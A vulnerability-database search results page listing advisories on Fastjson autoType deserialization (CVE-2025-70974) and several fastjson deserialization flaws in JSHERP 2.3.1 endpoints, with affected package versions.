237 matches found
FASTJSON Includes Functionality from Untrusted Control Sphere
Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an...
Unsafe Dependency Resolution
Overview com.alibaba:fastjson is a fast JSON parser/generator for Java. Affected versions of this package are vulnerable to Unsafe Dependency Resolution due to the unsafe implementation of the checkAutoType function. An attacker can execute arbitrary code by supplying a crafted JSON document...
ai.houyi:dorado (>=0.0.1 <=0.0.8), ai.houyi:dorado-core (>=0.0.11 <=0.0.51) +3602 more potentially affected by CVE-2025-70974 via com.alibaba:fastjson (>=1.1.15 <=1.2.47)
com.alibaba:fastjson MAVEN version =1.1.15, =0.0.1, =0.0.11, =0.0.16, =0.0.1, =0.0.14, =0.0.47, =0.0.14, =0.3.0, =3.0.0, =1.0.0, =1.0.1, =1.0.2 and more Source cves: CVE-2025-70974 Source advisory: SNYK:JAVA-COMALIBABA-14908847...
CVE-2025-70974
Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an...
CVE-2025-70974
Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an...
CVE-2025-70974
CVE-2025-70974 concerns Alibaba Fastjson before 1.2.48. The issue arises from how autoType is handled: when a JSON document contains an @type key whose value is a Java class name, certain public methods may be invoked, enabling a JNDI injection with an attacker-controlled payload. The vulnerabili...
EUVD-2026-1694
Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an...
CVE-2025-70974
Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an...
Fastjson 安全漏洞
Fastjson is Alibaba open source a Java-based fast JSON parser/generator . Fastjson versions prior to 1.2.48 security vulnerability , the vulnerability stems from improper handling of automatic types , which may lead to JNDI injection attacks...
PT-2026-1957
Name of the Vulnerable Software and Affected Versions Alibaba Fastjson versions prior to 1.2.48 Description The software contains a critical deserialization issue due to improper handling of the autoType feature, which could allow for remote code execution. The issue arises when a JSON document...
cc.ddrpa.dorian.polystash:polystash-spring-boot-starter (=1.0.0), com.alibaba.fastjson2:fastjson2-extension (>=2.0.27 <=2.0.62) +39 more potentially affected by CVE-2025-12183 via org.lz4:lz4-pure-java (=1.8.0)
org.lz4:lz4-pure-java MAVEN version =1.8.0 is affected by a known vulnerability. The following packages have a transitive dependency on org.lz4:lz4-pure-java and may be impacted: - cc.ddrpa.dorian.polystash:polystash-spring-boot-starter =1.0.0 - com.alibaba.fastjson2:fastjson2-extension =2.0.27,...
CVE-2025-51744
An issue was discovered in jishenghua JSHERP 2.3.1. The /user/addUser endpoint is vulnerable to fastjson deserialization attacks...
CVE-2025-51746
An issue was discovered in jishenghua JSHERP 2.3.1. The /serialNumber/addSerialNumber endpoint is vulnerable to fastjson deserialization attacks...
CVE-2025-51743
An issue was discovered in jishenghua JSHERP 2.3.1. The /materialCategory/addMaterialCategory endpoint is vulnerable to fastjson deserialization attacks...
CVE-2025-51742
An issue was discovered in jishenghua JSHERP 2.3.1. The /material/getMaterialEnableSerialNumberList endpoint passes the search query parameter directly to parseObject, introducing a Fastjson deserialization vulnerability that can lead to RCE via JDBC payloads...
CVE-2025-51745
An issue was discovered in jishenghua JSHERP 2.3.1. The /role/addcan endpoint is vulnerable to fastjson deserialization attacks...
EUVD-2025-199651
An issue was discovered in jishenghua JSHERP 2.3.1. The /materialCategory/addMaterialCategory endpoint is vulnerable to fastjson deserialization attacks...
EUVD-2025-199649
An issue was discovered in jishenghua JSHERP 2.3.1. The /role/addcan endpoint is vulnerable to fastjson deserialization attacks...
EUVD-2025-199650
An issue was discovered in jishenghua JSHERP 2.3.1. The /user/addUser endpoint is vulnerable to fastjson deserialization attacks...
EUVD-2025-199648
An issue was discovered in jishenghua JSHERP 2.3.1. The /serialNumber/addSerialNumber endpoint is vulnerable to fastjson deserialization attacks...